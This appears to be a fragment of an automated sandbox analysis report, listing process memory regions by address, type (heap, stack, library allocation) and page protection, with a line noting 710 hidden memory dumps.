heap
|
page read and write
|
||
|
13E3850E000
|
trusted library allocation
|
page read and write
|
||
|
13E383D7000
|
trusted library allocation
|
page read and write
|
||
|
13E37D05000
|
trusted library allocation
|
page read and write
|
||
|
13E37380000
|
trusted library allocation
|
page read and write
|
||
|
13E38A88000
|
trusted library allocation
|
page read and write
|
||
|
D798C7C000
|
stack
|
page read and write
|
||
|
13E383FB000
|
trusted library allocation
|
page read and write
|
||
|
13E38189000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF820000
|
trusted library allocation
|
page read and write
|
||
|
223E3AD0000
|
heap
|
page read and write
|
||
|
13E38324000
|
trusted library allocation
|
page read and write
|
||
|
13E373B0000
|
trusted library allocation
|
page read and write
|
||
|
13E38AA6000
|
trusted library allocation
|
page read and write
|
||
|
28904C60000
|
heap
|
page read and write
|
||
|
25D62AF3000
|
heap
|
page read and write
|
||
|
13E373B6000
|
trusted library allocation
|
page read and write
|
||
|
13E4EC11000
|
heap
|
page read and write
|
||
|
13E378B7000
|
trusted library allocation
|
page read and write
|
||
|
13E376FF000
|
trusted library allocation
|
page read and write
|
||
|
13E365D0000
|
heap
|
page execute and read and write
|
||
|
25D62B49000
|
heap
|
page read and write
|
||
|
13E385FD000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF960000
|
trusted library allocation
|
page read and write
|
||
|
25D62B4F000
|
heap
|
page read and write
|
||
|
28906510000
|
heap
|
page read and write
|
||
|
13E38250000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
AB302FE000
|
stack
|
page read and write
|
||
|
7FF9BF9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE40000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFA00000
|
trusted library allocation
|
page read and write
|
||
|
7B5DF6000
|
stack
|
page read and write
|
||
|
13E373C5000
|
trusted library allocation
|
page read and write
|
||
|
13E38838000
|
trusted library allocation
|
page read and write
|
||
|
C1409FE000
|
stack
|
page read and write
|
||
|
13E3819D000
|
trusted library allocation
|
page read and write
|
||
|
13E34B70000
|
heap
|
page read and write
|
||
|
13E46C06000
|
trusted library allocation
|
page read and write
|
||
|
25D62B4D000
|
heap
|
page read and write
|
||
|
13E38835000
|
trusted library allocation
|
page read and write
|
||
|
13E38B56000
|
trusted library allocation
|
page read and write
|
||
|
13E38B47000
|
trusted library allocation
|
page read and write
|
||
|
13E3789C000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF530000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFD60000
|
trusted library allocation
|
page read and write
|
||
|
13E3871F000
|
trusted library allocation
|
page read and write
|
||
|
13E37386000
|
trusted library allocation
|
page read and write
|
||
|
13E38C60000
|
trusted library allocation
|
page read and write
|
||
|
25D62C44000
|
heap
|
page read and write
|
||
|
13E4F83A000
|
heap
|
page read and write
|
||
|
13E37881000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFAC0000
|
trusted library allocation
|
page read and write
|
||
|
25D64540000
|
heap
|
page read and write
|
||
|
13E3886E000
|
trusted library allocation
|
page read and write
|
||
|
13E38B74000
|
trusted library allocation
|
page read and write
|
||
|
25D62B72000
|
heap
|
page read and write
|
||
|
13E38895000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF870000
|
trusted library allocation
|
page read and write
|
||
|
41F077E000
|
stack
|
page read and write
|
||
|
13E38AA9000
|
trusted library allocation
|
page read and write
|
||
|
7B5F7F000
|
stack
|
page read and write
|
||
|
13E38ABE000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF890000
|
trusted library allocation
|
page read and write
|
||
|
C140B7D000
|
stack
|
page read and write
|
||
|
7FF9BFBF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFEC0000
|
trusted library allocation
|
page read and write
|
||
|
13E38844000
|
trusted library allocation
|
page read and write
|
||
|
41F087F000
|
stack
|
page read and write
|
||
|
25D62A80000
|
heap
|
page read and write
|
||
|
13E38D88000
|
trusted library allocation
|
page read and write
|
||
|
13E37729000
|
trusted library allocation
|
page read and write
|
||
|
1EC8FB20000
|
heap
|
page read and write
|
||
|
13E38AAC000
|
trusted library allocation
|
page read and write
|
||
|
20B53A05000
|
heap
|
page read and write
|
||
|
13E34BC0000
|
heap
|
page read and write
|
||
|
13E4F8A4000
|
heap
|
page read and write
|
||
|
7FF9BF880000
|
trusted library allocation
|
page read and write
|
||
|
13E38247000
|
trusted library allocation
|
page read and write
|
||
|
13E378D8000
|
trusted library allocation
|
page read and write
|
||
|
13E4F909000
|
heap
|
page read and write
|
||
|
1EC8FB58000
|
heap
|
page read and write
|
||
|
25D62B64000
|
heap
|
page read and write
|
||
|
13E46C18000
|
trusted library allocation
|
page read and write
|
||
|
13E38850000
|
trusted library allocation
|
page read and write
|
There are 710 hidden memdumps, click here to show them.